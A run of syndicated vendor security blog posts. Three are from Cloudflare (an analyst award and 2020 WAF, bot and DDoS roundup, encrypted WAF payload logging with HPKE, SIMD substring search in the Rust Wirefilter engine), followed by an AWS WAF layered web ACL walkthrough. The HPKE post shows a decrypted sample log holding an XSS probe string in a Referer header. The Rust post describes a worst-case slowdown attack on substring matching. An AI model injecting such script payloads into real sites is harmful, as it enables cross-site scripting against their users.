We’re very pleased with how HPKE has worked out for us from an ease-of-implementation and performance standpoint. It was also an easy choice for us to make due to its impending standardization and best-of-both-worlds approach to security.

Holistic web protection: industry recognition for a prolific 2020

Post Syndicated from Patrick R. Donahue original https://blog.cloudflare.com/cloudflare-named-the-innovation-leader-in-holistic-web-protection/

Holistic web protection: industry recognition for a prolific 2020

I love building products that solve real problems for our customers. These days I don’t get to do so as much directly with our Engineering teams. Instead, about half my time is spent with customers listening to and learning from their security challenges, while the other half of my time is spent with other Cloudflare Product Managers (PMs) helping them solve these customer challenges as simply and elegantly as possible. While I miss the deeply technical engineering discussions, I am proud to have the opportunity to look back every year on all that we’ve shipped across our application security teams.

Taking the time to reflect on what we’ve delivered also helps to reinforce my belief in the Cloudflare approach to shipping product: release early, stay close to customers for feedback, and iterate quickly to deliver incremental value. To borrow a term from the investment world, this approach brings the benefits of compounded returns to our customers: we put new products that solve real-world problems into their hands as quickly as possible, and then reinvest the proceeds of our shared learnings immediately back into the product.

It is these sustained investments that allow us to release a flurry of small improvements over the course of a year, and be recognized by leading industry analyst firms for the capabilities we’ve accumulated and distributed to our customers. Today we’re excited to announce that Frost & Sullivan has named Cloudflare the Innovation Leader in their Frost Radar™: Global Holistic Web Protection Market Report. Frost & Sullivan’s view that this market “will gradually absorb the markets formed around legacy and point solutions” is consistent with our view of the world, and we’re leading the way in “the consolidation of standalone WAF, DDoS mitigation, and Bot Risk Management solutions” they believe is “poised to happen before 2025”.

Holistic web protection: industry recognition for a prolific 2020
Image © 2020 Frost & Sullivan from Frost Radar™: Global Holistic Web Protection Market Report

We are honored to receive this recognition, based on the analysis of 10 providers’ competitive strengths and opportunities as assessed by Frost & Sullivan. The rest of this post explains some of the capabilities that we shipped in 2020 across our Web Application Firewall (WAF), Bot Management, and Distributed Denial-of-Service product lines—the scope of Frost & Sullivan’s report. Get a copy of the Frost & Sullivan Frost Radar report to see why Cloudflare was named the Innovation Leader here.

2020 Web Security Themes and Roundup

Before jumping into specific product and feature launches, I want to briefly explain how we think about building and delivering our web security capabilities. The most important “product” by far that’s been built at Cloudflare over the past 10 years is the massive global network that moves bits securely around the world, as close to the speed of light as possible. Building our features atop this network allows us to reject the legacy tradeoff of performance or security. And equipping customers with the ability to program and extend the network with Cloudflare Workers and Firewall Rules allows us to focus on quickly delivering useful security primitives such as functions, operators, and ML-trained data—then later packaging them up in streamlined user interfaces.

We talk internally about building up the “toolbox” of security controls so customers can express their desired security posture, and that’s how we think about many of the releases over the past year that are discussed below. We begin by providing the saw, hammer, and nails, and let expert builders construct whatever defenses they see fit. By watching how these tools are put to use and observing the results of billions of attempts to evade the erected defenses, we learn how to improve and package them together as a whole for those less inclined to build from components. Most recently we did this with API Shield, providing a guided template to create “positive security” models within Firewall Rules using existing primitives plus new data structures for strong authentication such as Cloudflare-managed client SSL/TLS certificates. Each new tool added to the toolbox increases the value of the existing tools. Each new web request—good or bad—improves the models that our threat intelligence and Bot Management capabilities depend upon.

Web application firewall (WAF) usability at scale

Holistic web protection: industry recognition for a prolific 2020

Last year we spoke with many customers about our plan to decouple configuration from the zone/domain model and allow rules to be set for arbitrary paths and groups of services across an account. In 4Q2020 we put this granular control in the hands of a few developers and some of our most sophisticated enterprise customers, and we’re currently collecting and incorporating feedback before defaulting the capabilities on for new customers.

Rules are great, especially with increased flexibility, but without data structures and request enrichment at the edge (such as the Bot Management techniques described below) they cannot act on anything beyond static properties of the request. In 3Q2020 we released our IP Lists capabilities and customers have been steadily uploading their home-grown and third-party subscription lists. These lists can be referenced anywhere in a customer’s account as named variables and then combined with all other attributes of the request, even Bot Management scores, e.g., http.request.uri.path contains “/login” and (not ip.src in $pingdom_probes and cf.bot_management.score < 30) is a Firewall Rule filter that blocks all bots except Pingdom from accessing the login endpoint.

Requests that are blocked or challenged need to find their way as quickly as possible to our customers’ SOCs for triage, investigation and, occasionally, incident response, so we upgraded our edge-logging framework in 2Q2020 to push real time security-specific logs directly to customer SIEMs. And in 4Q2020, we released the ability to encrypt sensitive payloads within these logs using customer-provided encryption keys and novel encryption algorithms termed “Hybrid Public Key Encryption” (HPKE), and a data localization suite to provide control over where our customers’ data is stored and protected.

Built predominantly in 4Q2020 and currently being tested in the Firewall Rules engine is a brand new implementation of our Rate Limiting engine. By moving this matching and enforcement logic from a standalone tool to a component within a performant, memory-safe, expressive engine built in Rust, we have increased the utility of existing functions. Additional examples of improving this library of capabilities include the work completed in 1Q2020 to add HMAC functions and regex-based HTTP header and body inspection to the engine.

Bots and machine learning (ML)

Holistic web protection: industry recognition for a prolific 2020

In addition to making edge data sets accessible for request evaluation, we continued to invest heavily within our Bot Management team to provide actionable data so that our customers could decide what (if any) automated traffic they wanted to allow to interact with their applications. Our highest priority for Bot research and development has always been efficacy, and last year was no different. A significant portion of our engineering effort was dedicated to our detection engines — both updating and iterating on existing systems or creating entirely new detection engines from scratch.

In 1Q2020 we completed a total rewrite of our Machine Learning engine, and are continually focused on improving the efficacy of our ML engines. To do this, we draw on one of our major competitive advantages: the massive amount of data flowing through Cloudflare’s network. The early 2020 upgrade to our ML model nearly doubled the number of features we use to evaluate and score requests. And to help customers better understand why requests are flagged as bots, we have recently complemented the bot likelihood score in our logs with attribution to the specific engine that generated the score.

Also in 1Q2020, we upgraded our behavioral analysis engine to incorporate more features and increase overall accuracy. This engine conducts histogram-based outlier scoring and is now fully deployed to nearly all Bot Management zones.

In 2Q2020, we developed a lightweight JavaScript element that further advanced our browser fingerprinting capabilities and aids in detection. Specifically, we now silently challenge browsers and detect if a browser is misrepresenting its User Agent. This technique will be incorporated into our ML models and combined with our heuristics engine for more accurate browser fingerprinting. This feature is entirely optional and can be enabled or disabled by customers through our UI and API. Customers with extremely performance sensitive zones or traffic types that are unsuitable for JavaScript (such as API or some mobile app traffic) can still be accurately scored by our Bot Management engine.

In addition to detection, we also spent (and will continue to spend) engineering effort on mitigation. Our entire JavaScript and CAPTCHA challenge platform was rewritten in the last year and deployed to our customer zones in a staged fashion in the second half of 2020. Our new platform is faster and more robust at detecting automated systems attempting to solve the challenges. More importantly, this platform allows us to further invest in new challenge types and modes as we enter 2021.

The biggest and most well received feature released in 2020 was our dedicated Bot Management analytics, released in 3Q2020. We now present informative graphs that double as diagnostic tools. Customers have found that analytics are far more than interesting charts and statistics: in the case of Bot Management, analytics are essential to spotting and subsequently eliminating false positives.

Last but definitely not least, we announced the deprecation of the __cfduid cookie in 4Q2020 which was used primarily to detect bots but caused confusion for some customers including questions about whether they needed to display a cookie banner because of what we do.

To get a sense of the Bot Attack trends we saw in the first half of 2020, take a read through this blog post. And if you’re curious about how our ML models and heuristic engines work to keep your properties safe, this deep dive by Alex Bocharov, Machine Learning Tech Lead on the Bots team, is an excellent guide.

API and IoT security and protection

Holistic web protection: industry recognition for a prolific 2020

At the beginning of 4Q2020, we released a product called API Shield that was purpose built to secure, protect, and accelerate API traffic — and will eventually provide much of the common functionality expected in traditional API Gateways. The UI for API Shield was built on top of Firewall Rules for maximum flexibility, and will serve as the jump-off point for configuring additional API security features we have planned this year.

As part of API Shield, every customer now gets a fully managed, domain-scoped private CA generated for each of their zones, and we plan to continue working closely with the SSL/TLS team to expand CA management options based on feedback. Since the release, we’ve seen great adoption from in particular IoT companies focused on locking down their APIs using short-lived client certificates distributed out to devices. Customers can also now upload OpenAPI schemas to be matched against incoming requests from these devices, with bad requests being dropped at the edge rather than passed on to origin infrastructure.

Another capability we released in 4Q2020 was support for gRPC-based API traffic. Since that release, customers have expressed significant interest in using Cloudflare as a secure API gateway between easy-to-use customer-facing JSON endpoints and internal-facing gRPC or GraphQL endpoints. Like most customer challenges at Cloudflare, early adopters are looking to solve these use cases initially with Cloudflare Workers, but we’re keeping an eye on whether there are aspects for which we’ll want to provide first-class feature support.

Distributed Denial-of-Service (DDoS) protections for web applications and APIs

Holistic web protection: industry recognition for a prolific 2020

The application-layer security of a web application or API is of minimal importance if the service itself is not available due to a persistent DDoS attack at L3-L7. While mitigating such attacks has long been one of Cloudflare’s strengths, attack methodologies evolve and we continued to invest heavily in 2020 to drop attacks more quickly, more efficiently, and more precisely; as a result, automatic mitigation techniques are applied immediately and most malicious traffic is blocked in less than 3 seconds.

Early in 2020 we responded to a persistent increase in smaller, more localized attacks by fine-tuning a system that can autonomously detect attacks on any server in any datacenter. In the month prior to us first posting about this tool, it mitigated almost 300,000 network-layer attacks, roughly 55 times greater than the tool we previously relied upon. This new tool, dubbed “dosd”, leverages Linux’s eXpress Data Path (XDP) and allows our system to quickly — and automatically — deploy rules eBPF rules that run on each packet received. We further enhanced our edge mitigation capabilities in 3Q2020 by developing and releasing a protection layer that can operate even in environments where we only see one side of the TCP flow. These network layer protections help protect our customers who leverage both Magic Transit to protect their IP ranges and our WAF to protect their applications and APIs.

To document and provide visibility into these attacks, we released a GraphQL-backed interface in 1Q2020 called Network Analytics. Network Analytics extends the visibility of attacks against our customers’ services from L7 to L3, and includes detailed attack logs containing data such as top source and destination IPs and ports, ASNs, data centers, countries, bit rates, protocol and TCP flag distributions. A litany of improvements made to this graphical rendering engine over the course of 2020 have benefitted all analytics tools using the same front-end. In 4Q2020, Network Analytics was extended to provide traffic and attack insights into Cloudflare Spectrum-protected applications, which are terminated at L4 (TCP/UDP).

Towards the end of 4Q2020, we released real-time DDoS attack alerting capable of sending emails or pages via PagerDuty to alert security teams of ongoing attacks and mitigations. This capability was released just in time to assist with the onslaught of ransomware attacks that Cloudflare helped detect and defend against. For additional context on unique attacks we fought off in 2020, consider reading about an acoustics inspired attack, a 754 million packet-per-second, or a roundup of attacks from 1Q2020, 2Q2020, or 3Q2020.

Wrapping up and looking towards 2021

2020 was a tough year around the world. Throughout what has also been, and continues to be, a period of heightened cyberattacks and breaches, we feel proud that our teams were able to release a steady flow of new and improved capabilities across several critical security product areas reviewed by Frost & Sullivan. These releases culminated in far greater protections for customers at the end of the year than the beginning, and a recognition for our sustained efforts.

We are pleased to have been named the Innovation Leader in their Frost Radar™: Global Holistic Web Protection Market Report, which “addresses organizations’ demand for consolidated, single pane of glass solutions, which not only reduce the security gaps of legacy products but also provide simplified management capabilities”.

As we look towards 2021 we plan to continue releasing early and often, listening to feedback from our customers, and delivering incremental value along the way. If you have ideas on what additional capabilities you’d like to use to protect your applications and networks, we’d love to hear them below in the comments.

Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)

Post Syndicated from Michael Tremante original https://blog.cloudflare.com/encrypt-waf-payloads-hpke/

Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)

Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)

The Cloudflare Web Application Firewall (WAF) blocks more than 72B malicious requests per day from reaching our customers’ applications. Typically, our users can easily confirm these requests were not legitimate by checking the URL, the query parameters, or other metadata that Cloudflare provides as part of the security event log in the dashboard.

Sometimes investigating a WAF event requires a bit more research and a trial and error approach, as the WAF may have matched against a field that is not logged by default.

Not logging all parts of a request is intentional: HTTP headers and payloads often contain sensitive data, including personally identifiable information, which we consider a toxic asset. Request headers may contain cookies and POST payloads may contain username and password pairs submitted during a login attempt among other sensitive data.

We recognize that providing clear visibility in any security event is a core feature of a firewall, as this allows users to better fine tune their rules. To accomplish this, while ensuring end-user privacy, we built encrypted WAF matched payload logging. This feature will log only the specific component of the request the WAF has deemed malicious — and it is encrypted using a customer-provided key to ensure that no Cloudflare employee can examine the data*. Additionally, the crypto uses an exciting new standard — developed in part by Cloudflare — called Hybrid Public Key Encryption (HPKE).

*All Cloudflare logs are encrypted at rest. This feature implements a second layer of encryption for the specific matched fields so that only the customer can decrypt it.

Encrypting Matched Payloads

To turn on this feature, you need to provide a public key, or generate a private-public key pair directly from the dashboard. Your data will then be encrypted using Hybrid Public Key Encryption (HPKE), which offers a great combination of both performance and security.

Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)
Encrypting your WAF Payloads with Hybrid Public Key Encryption (HPKE)

To simplify this process, we have built an easy-to-use command line utility to generate the key pair:

$ matched-data-cli generate-key-pair
{
  "private_key": "uBS5eBttHrqkdY41kbZPdvYnNz8Vj0TvKIUpjB1y/GA=",
  "public_key": "Ycig/Zr/pZmklmFUN99nr+taURlYItL91g+NcHGYpB8="
}

Cloudflare does not store the private key and it is our customers’ responsibility to ensure it is stored safely. Lost keys, and the data encrypted with them, cannot be recovered but customers can rotate keys to be used with future payloads.

Once encrypted, payloads will be available in the logs as encrypted base64 blobs within the metadata field:

"metadata": [
  {
    "key": "encrypted_matched_data",
    "Value": "AdfVn7odpamJGeFAGj0iW2oTtoXOjVnTFT2x4l+cHKJsEQAAAAAAAAB+zDygjV2aUI92FV4cHMkp+4u37JHnH4fUkRqasPYaCgk="
  }
]

Decrypting payloads can be done via the dashboard from the Security Events log, or by using the command line utility, as shown below. If done via the dashboard, the browser will decrypt the payload locally (i.e., client side) and will not send the private key to Cloudflare.

$ printf $PRIVATE_KEY | ./matched-data-cli decrypt -d AdfVn7odpamJGeFAGj0iW2oTtoXOjVnTFT2x4l+cHKJsEQAAAAAAAAB+zDygjV2aUI92FV4cHMkp+4u37JHnH4fUkRqasPYaCgk= --private-key-stdin

The command above returns:

{"REQUEST_HEADERS:REFERER":"https:\/\/example.com\/testkey.txt?a=<script>alert('xss');<\/script>"}

In the example above, the WAF matched against the REQUEST_HEADERS:REFERER field. Any other fields the WAF matched on would be similarly logged.

Better Logging with User Privacy in Mind

In the coming months, this feature will be available on our dashboard to our Enterprise customers. Enterprise customers who would like this feature enabled sooner should reach out to their account team. Only application owners who also have access to the Cloudflare dashboard as Super Administrators will be able to configure encrypted matched payload logging. Those who do not have access to the private key, including Cloudflare staff, are not able to decrypt the logs.

We are also excited for this feature to be one of our first to use Hybrid Public Key Encryption, and for Cloudflare to use this emerging standard developed by the Crypto Forum Research Group (CFRG), the research body that supports the development of Internet standards at the IETF. And stay tuned, we will publish a deep dive post with the technical details soon!

Building even faster interpreters in Rust

Post Syndicated from Zak Cutner original https://blog.cloudflare.com/building-even-faster-interpreters-in-rust/

Building even faster interpreters in Rust

Building even faster interpreters in Rust

At Cloudflare, we’re constantly working on improving the performance of our edge — and that was exactly what my internship this summer entailed. I’m excited to share some improvements we’ve made to our popular Firewall Rules product over the past few months.

Firewall Rules lets customers filter the traffic hitting their site. It’s built using our engine, Wirefilter, which takes powerful boolean expressions written by customers and matches incoming requests against them. Customers can then choose how to respond to traffic which matches these rules. We will discuss some in-depth optimizations we have recently made to Wirefilter, so you may wish to get familiar with how it works if you haven’t already.

Minimizing CPU usage

As a new member of the Firewall team, I quickly learned that performance is important — even in our security products. We look for opportunities to make our customers’ Internet properties faster where it’s safe to do so, maximizing both security and performance.

Our engine is already heavily used, powering all of Firewall Rules. But we have bigger plans. More and more products like our Web Application Firewall (WAF) will be running behind our Wirefilter-based engine, and it will become responsible for eating up a sizable chunk of our total CPU usage before long.

How to measure performance?

Measuring performance is a notoriously tricky task, and as you can probably imagine trying to do this in a highly distributed environment (aka Cloudflare’s edge) does not help. We’ve been surprised in the past by optimizations that look good on paper, but, when tested out in production, just don’t seem to do much.

Our solution? Performance measurement as a service — an isolated and reproducible benchmark for our Firewall engine and a framework for engineers to easily request runs and view results. It’s worth noting that we took a lot of inspiration from the fantastic Rust Compiler benchmarks to build this.

Building even faster interpreters in Rust
Our benchmarking framework, showing how performance during different stages of processing Wirefilter expressions has changed over time [1].

What to measure?

Our next challenge was to find some meaningful performance metrics. Some experimentation quickly uncovered that time was far too volatile a measure for meaningful comparisons, so we turned to hardware counters [2]. It’s not hard to find tools to measure these (perf and VTune are two such examples), although they (mostly) don’t allow control over which parts of the program are recorded. In our case, we wished to individually record measurements for different stages of filter processing — parsing, compilation, analysis, and execution.

Once again we took inspiration from the Rust compiler, and its self-profiling options, using the perf_event_open API to record counters from inside our binary. We then output something like the following, which our framework can easily ingest and store for later visualization.

Building even faster interpreters in Rust
Output of our benchmarks in JSON Lines format, showing a list of recordings for each combination of hardware counter and Wirefilter processing stage. We’ve used 10 repeats here for readability, but we use around 20, in addition to 5 warmup rounds, within our framework.

Whilst we mainly focussed on metrics relating to CPU usage, we also use a combination of getrusage and clear_refs to find the maximum resident set size (RSS). This is useful to understand the memory impact of particular algorithms in addition to CPU.

But the challenge was not over. Cloudflare’s standard CI agents use virtualization and sandboxing for security and convenience, but this makes accessing hardware counters virtually impossible. Running our benchmarks on a dedicated machine gave us access to these counters, and ensured more reproducible results.

Speeding up the speed test

Our benchmarks were designed from the outset to take an important place in our development process. For instance, we now perform a full benchmark run before releasing each new version to detect performance regressions.

But with our benchmarks in place, it quickly became clear that we had a problem. Our benchmarks simply weren’t fast enough — at least if we wanted to complete them in less than a few hours! The problem was we have a very large number  of filters. Since our engine would never usually execute requests against this many filters at once it was proving incredibly costly. We came up with a few tricks to cut this down…

  • Deduplication. It turns out that only around a third of filters are structurally unique (something that is easy to check as Wirefilter can helpfully serialize to JSON). We managed to cut down a great deal of time by ignoring duplicate filters in our benchmarks.
  • Sampling. Still, we had too many filters and random sampling presented an easy solution. A more subtle challenge was to make sure that the random sample was always the same to maintain reproducibility.
  • Partitioning. We worried that deduplication and sampling would cause us to miss important cases that are useful to optimize. By first partitioning filters by Wirefilter language feature, we can ensure we’re getting a good range of filters. It also helpfully gives us more detail about where specifically the impact of a performance change is.

Most of these are trade-offs, but very necessary ones which allow us to run continual benchmarks without development speed grinding to a halt. At the time of writing, we’ve managed to get a benchmark run down to around 20 minutes using these ideas.

Optimizing our engine

With a benchmarking framework in place, we were ready to begin testing optimizations. But how do you optimize an interpreter like Wirefilter? Just-in-time (JIT) compilation, selective inlining and replication were some ideas floating around in the word of interpreters that seemed attractive. After all, we previously wrote about the cost of dynamic dispatch in Wirefilter. All of these techniques aim to reduce that effect.

However, running some real filters through a profiler tells a different story. Most execution time, around 65%, is spent not resolving dynamic dispatch calls but instead performing operations like comparison and searches. Filters currently in production tend to be pretty light on functions, but throw in a few more of these and even less time would be spent on dynamic dispatch. We suspect that even a fair chunk of the remaining 35% is actually spent reading the memory of request fields.

Function CPU time
`matches` operator 0.6%
`in` operator 1.1%
`eq` operator 11.8%
`contains` operator 51.5%
Everything else 35.0%
Breakdown of CPU time while executing a typical production filter.

An adventure in substring searching

By now, you shouldn’t be surprised that the contains operator was one of the first in line for optimization. If you’ve ever written a Firewall Rule, you’re probably already familiar with what it does — it checks whether a substring is present in the field you are matching against. For example, the following expression would match when the host is “example.com” or “www.example.net”, but not when it is “cloudflare.com”. In string searching algorithms, this is commonly referred to as finding a ‘needle’ (“example”) within a ‘haystack’ (“example.com”).

http.host contains “example”

How does this work under the hood? Ordinarily, we may have used Rust’s `String::contains` function but Wirefilter also allows raw byte expressions that don’t necessarily conform to UTF-8.

http.host contains 65:78:61:6d:70:6c:65

We therefore used the memmem crate which performs a two-way substring search algorithm on raw bytes.

Sounds good, right? It was, and it was working pretty well, although we’d noticed that rewriting `contains` filters using regular expressions could bizarrely often make them faster.

http.host matches “example”

Regular expressions are great, but since they’re far more powerful than the `contains` operator, they shouldn’t be faster than a specialized algorithm in simple cases like this one.

Something was definitely up. It turns out that Rust’s regex library comes equipped with a whole host of specialized matchers for what it deems to be simple expressions like this. The obvious question was whether we could therefore simply use the regex library. Interestingly, you may not have realized that the popular ripgrep tool does just that when searching for fixed-string patterns.

However, our use case is a little different. Since we’re building an interpreter (and we’re using dynamic dispatch in any case), we would prefer to dispatch to a specialized case for `contains` expressions, rather than matching on some enum deep within the regex crate when the filter is executed. What’s more, there are some pretty cool things being done to perform substring searching that leverages SIMD instruction sets. So we wired up our engine to some previous work by Wojciech Muła and the results were fantastic.

Benchmark Improvement
Expressions using `contains` operator 72.3%
‘Simple’ expressions 0.0%
All expressions 31.6%
Improvements in instruction count using Wojciech Muła’s sse4-strstr library over the memmem crate with Wirefilter.

I encourage you to read more on “Algorithm 1”, which we used, but it works something like this (I’ve changed the order a little to help make it clearer). It’s worth reading up on SIMD instructions if you’re unfamiliar with them — they’re the essence behind what makes this algorithm fast.

  1. We fill one SIMD register with the first byte of the needle being searched for, simply repeated over and over.
  2. We load as much of our haystack as we can into another SIMD register and perform a bitwise equality operation with our previous register.
  3. Now, any position in the resultant register that is 0 cannot be the start of the match since it doesn’t start with the same byte of the needle.
  4. We now repeat this process with the last byte of the needle, offsetting the haystack, to rule out any positions that don’t end with the same byte as the needle.
  5. Bitwise ANDing these two results together, we (hopefully) have now drastically reduced our potential matches.
  6. Each of the remaining potential matches can be checked manually using a memcmp operation. If we find a match, then we’re done.
  7. If not, we continue with the next part of our haystack and repeat until we’ve checked the entire thing.

When it goes wrong

You may be wondering what happens if our haystack doesn’t fit neatly into registers. In the original algorithm, nothing. It simply continues reading into the oblivion after the end of the haystack until the last register is full, and uses a bitmask to ignore potential false-positives from this additional region of memory.

As we mentioned, security is our priority when it comes to optimizations, so we could never deploy something with this kind of behaviour. We ended up porting Muła’s library to Rust (we’ve also open-sourced the crate!) and performed an overlapping registers modification found in ARM’s blog.

It’s best illustrated by example — notice the difference between how we would fill registers on an imaginary SIMD instruction-set with 4-byte registers.

Before modification

Building even faster interpreters in Rust
How registers are filled in the original implementation for the haystack “abcdefghij”, red squares indicate out of bounds memory.

After modification

Building even faster interpreters in Rust
How registers are filled with the overlapping modification for the same haystack, notice how ‘g’ and ‘h’ each appear in two registers.

In our case, repeating some bytes within two different registers will never change the final outcome, so this modification is allowed as-is. However, in reality, we found it was better to use a bitmask to exclude repeated parts of the final register and minimize the number of memcmp calls.

What if the haystack is too small to even fill a single register? In this case, we can’t use our overlapping trick since there’s nothing to overlap with. Our solution is straightforward: while we were primarily targeting AVX2, which can store 32-bytes in a lane, we can easily move down to another instruction set with smaller registers that the haystack can fit into. In reality, we don’t currently go any smaller than SSE2. Beyond this, we instead use an implementation of the Rabin-Karp searching algorithm which appears to perform well.

Instruction set Register size
AVX2 32 bytes
SSE2 16 bytes
SWAR (u64) 8 bytes
SWAR (u32) 4 bytes
Register sizes in different SIMD instruction sets [3]. We did not consider AVX512 since support for this is not widespread enough.

Is it always fast?

Choosing the first and last bytes of the needle to rule out potential matches is a great idea. It means that when it does come to performing a memcmp, we can ignore these, as we know they already match. Unfortunately, as Muła points out, this also makes the algorithm susceptible to a worst-case attack in some instances.

Let’s give an expression that a customer might write to illustrate this.

http.request.uri.path contains “/wp-admin/”

If we try to search for this within a very long sequence of ‘/’s, we will find a potential match in every position and make lots of calls to memcmp — essentially performing a slow bruteforce substring search.

Clearly we need to choose different bytes from the needle. But which ones should we choose? For each choice, an adversary can always find a slightly different, but equally troublesome, worst case. We instead use randomness to throw off our would-be adversary, picking the first byte of the needle as before, but then choosing another random byte to use.

Our new version is unsurprisingly slower than Muła’s, yet it still exhibits a great improvement over both the memmem and regex crates. Performance, but without sacrificing safety.

Benchmark Improvement
sse4-strstr (original) sliceslice (our version)
Expressions using `contains` operator 72.3% 49.1%
‘Simple’ expressions 0.0% 0.1%
All expressions 31.6% 24.0%
Improvements in instruction count of using sse4-strstr and sliceslice over the memmem crate with Wirefilter.

What’s next?

This is only a small taste of the performance work we’ve been doing, and we have much more yet to come. Nevertheless, none of this would have been possible without the support of my manager Richard and my mentor Elie, who contributed a lot of these ideas. I’ve learned so much over the past few months, but most of all that Cloudflare is an amazing place to be an intern!

[1] Since our benchmarks are not run within a production environment, results in this post do not represent traffic on our edge.

[2] We found instruction counts to be a particularly stable measure, and CPU cycles a particularly unstable one.

[3] Note that SWAR is technically not an instruction set, but instead uses regular registers like vector registers.

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)

Post Syndicated from Daniel Swart original https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications.

In part 1 of this post I describe the technologies and methods that you can use to build and manage defense in depth for your network. In part 2, I will show you how to use those tools to build your defense in depth using AWS Managed Rules as the starting point and how it can be used for optimal effectiveness

Managing policies for multiple environments can be done with minimal administrative overhead and can now be part of a deployment pipeline where you programmatically enforce policies for broad edge network policy enforcements and protect production workloads without compromising on development speed or safety.

Building robust security policy enforcement relies on a layered approach and the same applies to securing your web applications. Having edge policies, application policies, and even private or internal policy enforcement layers adds to the visibility of communication requests as well as unified policy enforcement.

Using a layered AWS WAF deployment, such as is deployed by the procedure that follows, gives you greater flexibility in the amount of rules you can use and the option to standardize edge policies and production policies. This lets you test and develop new applications without comprising the production environments.

In the following example, the application load balancer is in us-east-1. To create a web ACL for Amazon CloudFront you need to deploy the stack in us-east-1. The Amazon-CloudFront-Application-Load-Balancer-AMR.yml template can create both web ACLs in this scenario.

Note: If you’re using CloudFront and hosting the origin in us-east-1, you only need to maintain one stack. If your origin is in another region, you need to deploy a stack in us-east-1 for CloudFront web ACLs and another in the region where your application load balancer is. That scenario isn’t covered in the following procedure. None of the underlying infrastructure would be deployed with the example AWS CloudFromation templates provided. Only the AWS WAF configurations would be deployed using the example templates.

Solution overview

The following diagram illustrates the traffic flow where traffic comes in via CloudFront and serves the traffic to the backend load balancers. Both CloudFront and the load balancers support AWS WAF. This is where dedicated web security policies can be enforced to build out a defense-in-depth, multi layered policy enforcement.
 

Figure 1: Defense in depth deployment on AWS WAF

Figure 1: Defense in depth deployment on AWS WAF

Creating AWS Managed Rule web ACLs

During this process we create two web ACLs that are designed for policy enforcement for two dedicated layers. The process won’t deploy the required infrastructure, such as the CloudFront distribution or application load balancers. This example template deploys a single stack in us-east-1 where the CloudFront origin load balancer is located.

To create AWS Managed Rule web ACLs

  1. Download the Amazon-CloudFront-Application-Load-Balancer-AMR.yml template.
  2. Open the AWS Management Console and select the region where the origin application load balancer is deployed. The Amazon-CloudFront-Application-Load-Balancer-AMR.yml template that you downloaded deploys both web ACLs for CloudFront and the application load balancer.
     
    Figure 2: Select a region from the console

    Figure 2: Select a region from the console

  3. Under Find Services enter AWS CloudFormation and select Enter.
     
    Figure 3: Find and select AWS CloudFormation

    Figure 3: Find and select AWS CloudFormation

  4. Select Create stack.
     
    Figure 4: Create stack

    Figure 4: Create stack

  5. Select a template file for the stack.
    1. In the Create stack window, select Template is ready and Upload a template file.
    2. Under Upload a template file, select Choose file and select the Amazon-CloudFront-Application-Load-Balancer-AMR.yml example AWS CloudFormation template you downloaded earlier.
    3. Choose Next.
    Figure 5: Prepare and choose a template

    Figure 5: Prepare and choose a template

  6. Add stack details.
    1. Enter a name for the stack in Stack name.
    2. Enter a name for the Edge Network AWS WAF WebACL and for the Public Layer AWS WAF WebACL.
    3. Set a rate-limit for HTTP GET requests in HTTP Get Flood Protection (this rate is applied per IP address over a 5 minute period).
    4. Set a rate limit for HTTP POST requests in HTTP Post Flood Protection.
    5. Use the Login URL to apply the limit to a targeted login page. If you want to rate-limit all HTTP POST requests, leave the login URL section blank.
    Figure 6: Set stack details

    Figure 6: Set stack details

  7. By default, all the rules within the rule-sets are in action override (count mode). This does not include the rate based rules. If you want to deploy selected rules in a block, remove them from the pre-populated list by highlighting and deleting them. It’s best practice to evaluate firewall rules before changing them from count to block mode. Choose Next to move to the next step.
     
    Figure 7: Default managed rules options

    Figure 7: Default managed rules options

  8. Here you can add tags to apply to the resources in the stack that these rules will be deployed to. Tagging is a recommended best practice as it enables you to add metadata information to resources during the creation. For more information on tagging please see the Tagging AWS resources documentation. Then choose Next. On the following page choose Create stack.
     
    Figure 8: Add tags

    Figure 8: Add tags

  9. Wait until the stack has been deployed. When deployment is complete, the status of the stack will change to CREATE_COMPLETE.
     
    Figure 9: Stack deployment status

    Figure 9: Stack deployment status

Associating the web ACLs to resources

During this process we associate the two newly created web ACLs to the corresponding infrastructure resources. In this example, it would be the CloudFront distribution and its origin load balancer which should have been created prior.

To associate the web ACLs to resources

  1. In the console search for and select WAF & Shield.
     
    Figure 10: Select WAF & Shield

    Figure 10: Select WAF & Shield

  2. Select Web ACLs from the list on the left.
     
    Figure 11: Select Web ACLs

    Figure 11: Select Web ACLs

  3. Select Global (CloudFront) from the drop down list at the top of the page. Choose the Edge-Network-Layer-WebACL name that you created in step 6 of the previous procedure (Creating AWS Managed Rule web ACLs).
     
    Figure 12: Select the web ACL

    Figure 12: Select the web ACL

  4. Next select Associated AWS and then choose Add AWS resources.
     
    Figure 13: Add AWS resources

    Figure 13: Add AWS resources

  5. Select the CloudFront distribution you want to protect. Choose Add.
     
    Figure 14: Select the CloudFront distribution to protect

    Figure 14: Select the CloudFront distribution to protect

  6. Select the region the application load balancer is deployed in—this example is us-east-1—and then repeat the same association process as in steps by selecting Web ACLs and now associating the Application Load Balancer similar to steps 3 and 4 above. However, this time, select the application load balancer that serves as the CloudFront Distribution origin. Select US East (N. Virginia) from the drop-down list at the top of the page. Choose the Public-Application-Layer-WebACL name that you created in step 6 of the previous procedure (Creating AWS Managed Rule web ACLs).
     
    Figure 15: Application layer Web ACL association

    Figure 15: Application layer Web ACL association

Conclusion

Using AWS WAF to manage a multi-layer web application security enforcement policy you are able to build defense in depth stack for each specific web application. The configuration will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. Now with AWS Managed Rules this has enabled customers to make use of prebuild rule sets that can easily be deployed to create a layered defense that will fit into customers web application deployment pipelines. For customers that would like to centrally manage and control WAF in their AWS Organization, consider AWS Firewall Manager.

The AWS CloudFormation templates used in this procedure are in this GitHub repository.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the AWS WAF forum or contact AWS Support.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Daniel Cisco Swart

